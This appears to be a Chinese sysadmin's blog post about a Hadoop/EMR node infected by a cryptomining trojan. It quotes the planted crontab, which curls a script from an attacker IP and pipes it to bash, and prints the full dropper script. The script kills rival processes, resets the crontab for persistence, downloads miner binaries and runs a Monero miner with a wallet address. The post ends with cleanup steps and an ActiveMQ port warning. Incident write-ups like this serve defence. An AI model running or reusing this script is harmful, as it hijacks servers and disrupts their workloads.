supsplk 服务器被植入木马 挖矿 cpu使用 700%

最近emr集群跑任务的时候总出现 task failed ，优化sql，调提交任务参数都没解决，最后再我排查时候，发现一个从节点的cpu使用800%

经过一些列排查，发现是被注入木马了，

#被人种下的crontab
#* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s

点击过去伪装的是一张图片，其实crul过去是下面的脚本，，，具体你们应该可以知道了吧，最后居然发现他么是在挖矿，

#!/bin/sh
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
pkill -f JnKihGjn
pkill -f KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -f NXLAi
pkill -f XJnRj
pkill -f accounts-daemon
pkill -f askdljlqw
pkill -f atd
pkill -f bonn.sh
pkill -f bonns
pkill -f carbon
pkill -f conn.sh
pkill -f conns
pkill -f crypto-pool
pkill -f ddg
pkill -f donns
pkill -f gekoCrw
pkill -f gekoCrw32
pkill -f gekoba2anc1
pkill -f gekoba5xnc1
pkill -f gekobalanc1
pkill -f gekobalance
pkill -f gekobalanq1
pkill -f gekobnc1
pkill -f ir29xc1
pkill -f irpbalanc1
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f jaav
pkill -f jva
pkill -f kw.sh
pkill -f kworker34
pkill -f kxjd
pkill -f lexarbalanc1
pkill -f lower.sh
pkill -f lowerv2.sh
pkill -f lowerv3.sh
pkill -f minerd
pkill -f minergate
pkill -f minergate-cli
pkill -f minexmr
pkill -f mixnerdx
pkill -f mule
pkill -f mutex
pkill -f myatd
pkill -f performedl
pkill -f polkitd
pkill -f pro.sh
pkill -f pubg
pkill -f pvv
pkill -f root.sh
pkill -f rootv2.sh
pkill -f rootv3.sh
pkill -f servcesa
pkill -f sleep
pkill -f sourplum
pkill -f stratum
pkill -f vsp
pkill -f watch-smart
pkill -f wget
pkill -f ysaydh
pkill -f acpid
pkill -9 ./atd
pkill -9 /tmp/wa/httpd.conf
pkill -9 108.61.186.224
pkill -9 128.199.86.57
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 45.76.102.45
pkill -9 ./AnXqV.yam
pkill -9 ./BI5zj
pkill -9 ./Carbon
pkill -9 ./Duck.sh
pkill -9 ./Guard.sh
pkill -9 ./JnKihGjn
pkill -9 ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -9 ./NXLAi
pkill -9 ./XJnRj
pkill -9 ./accounts-daemon
pkill -9 ./askdljlqw
pkill -9 ./atd
pkill -9 ./bonn.sh
pkill -9 ./bonns
pkill -9 ./carbon
pkill -9 ./conn.sh
pkill -9 ./conns
pkill -9 ./crypto-pool
pkill -9 ./ddg
pkill -9 ./donns
pkill -9 ./gekoCrw
pkill -9 ./gekoCrw32
pkill -9 ./gekoba2anc1
pkill -9 ./gekoba5xnc1
pkill -9 ./gekobalanc1
pkill -9 ./gekobalance
pkill -9 ./gekobalanq1
pkill -9 ./gekobnc1
pkill -9 ./ir29xc1
pkill -9 ./irpbalanc1
pkill -9 ./jIuc2ggfCAvYmluL2Jhc2gi
pkill -9 ./jaav
pkill -9 ./jva
pkill -9 ./kw.sh
pkill -9 ./kworker34
pkill -9 ./kxjd
pkill -9 ./lexarbalanc1
pkill -9 ./lower.sh
pkill -9 ./lowerv2.sh
pkill -9 ./lowerv3.sh
pkill -9 ./minerd
pkill -9 ./minergate
pkill -9 ./minergate-cli
pkill -9 ./minexmr
pkill -9 ./mixnerdx
pkill -9 ./mule
pkill -9 ./mutex
pkill -9 ./myatd
pkill -9 ./performedl
pkill -9 ./polkitd
pkill -9 ./pro.sh
pkill -9 ./pubg
pkill -9 ./pvv
pkill -9 ./root.sh
pkill -9 ./rootv2.sh
pkill -9 ./rootv3.sh
pkill -9 ./servcesa
pkill -9 ./sleep
pkill -9 ./sourplum
pkill -9 ./stratum
pkill -9 ./vsp
pkill -9 ./watch-smart
pkill -9 ./wget
pkill -9 ./ysaydh
pkill -9 ./acpid
pkill ./atd
pkill /tmp/wa/httpd.conf
pkill 108.61.186.224
pkill 128.199.86.57
pkill 142.4.124.164
pkill 192.99.56.117
pkill 45.76.102.45
pkill ./AnXqV.yam
pkill ./BI5zj
pkill ./Carbon
pkill ./Duck.sh
pkill ./Guard.sh
pkill ./JnKihGjn
pkill ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill ./NXLAi
pkill ./XJnRj
pkill ./accounts-daemon
pkill ./askdljlqw
pkill ./atd
pkill ./bonn.sh
pkill ./bonns
pkill ./carbon
pkill ./conn.sh
pkill ./conns
pkill ./crypto-pool
pkill ./ddg
pkill ./donns
pkill ./gekoCrw
pkill ./gekoCrw32
pkill ./gekoba2anc1
pkill ./gekoba5xnc1
pkill ./gekobalanc1
pkill ./gekobalance
pkill ./gekobalanq1
pkill ./gekobnc1
pkill ./ir29xc1
pkill ./irpbalanc1
pkill ./jIuc2ggfCAvYmluL2Jhc2gi
pkill ./jaav
pkill ./jva
pkill ./kw.sh
pkill ./kworker34
pkill ./kxjd
pkill ./lexarbalanc1
pkill ./lower.sh
pkill ./lowerv2.sh
pkill ./lowerv3.sh
pkill ./minerd
pkill ./minergate
pkill ./minergate-cli
pkill ./minexmr
pkill ./mixnerdx
pkill ./mule
pkill ./mutex
pkill ./myatd
pkill ./performedl
pkill ./polkitd
pkill ./pro.sh
pkill ./pubg
pkill ./pvv
pkill ./root.sh
pkill ./rootv2.sh
pkill ./rootv3.sh
pkill ./servcesa
pkill ./sleep
pkill ./sourplum
pkill ./stratum
pkill ./vsp
pkill ./watch-smart
pkill ./wget
pkill ./ysaydh
pkill ./acpid
ps aux | grep -v supsplk | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/atd
mkdir /var/tmp
pkill -9 tratum
pkill -9 mixnerdx
pkill -9 performedl
pkill -9 sleep
pkill -9 /tmp/httpd.conf
pkill -9 JnKihGjn
pkill -9 irqba2anc1
pkill -9 irqba5xnc1
pkill -9 irqbnc1
pkill -9 ir29xc1
pkill -9 conns
ps auxw|head -1;ps auxw|sort -rn -k3|head -1|awk '{if($3>60.0) print "kill -9 " $2}'|sh
pkill -9 irqbalance
pkill -9 crypto-pool
pkill -9 XJnRj
pkill -9 NXLAi
pkill -9 BI5zj
pkill -9 askdljlqw
pkill -9 minerd
pkill -9 minergate
pkill -9 Guard.sh
pkill -9 ysaydh
pkill -9 bonns
pkill -9 donns
pkill -9 kxjd
pkill -f sleep
pkill -f /tmp/m
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f bb
pkill -9 atd
pkill -9 accounts-daemon
pkill -f yam
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "snapd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mysql_dump"|awk '{print $2}'|xargs kill -9
crontab -r || true && \
echo "* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
docker pause `docker ps|grep kube-apis |awk '{print $1}'`
docker pause `docker ps|grep nginx78 |awk '{print $1}'`
curl -o /var/tmp/config.json http://158.69.133.17:8220/config_1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/gcc
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/c1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/minerd
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd2
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd3
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/supsplk http://158.69.133.17:8220/yam
chmod 777 /var/tmp/supsplk
cd /var/tmp
nohup ./supsplk -c x -M stratum+tcp://41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo:x@monerohash.com:3333/xmr >/dev/null &
fi
echo "runing....."

解决办法

找到寄生的目录，一般他都会在tmp里，我这个再”/var/tmp/“ 首先你先吧他的crontab干掉 然后 把这个目录下的他脚本产生的文件干掉，然后再把对应的进程杀掉。

上面说的治标不治本，你服务器被攻击了，安全问题，对了 activemp 他的开放端口61616 有漏洞，把这个限制了吧。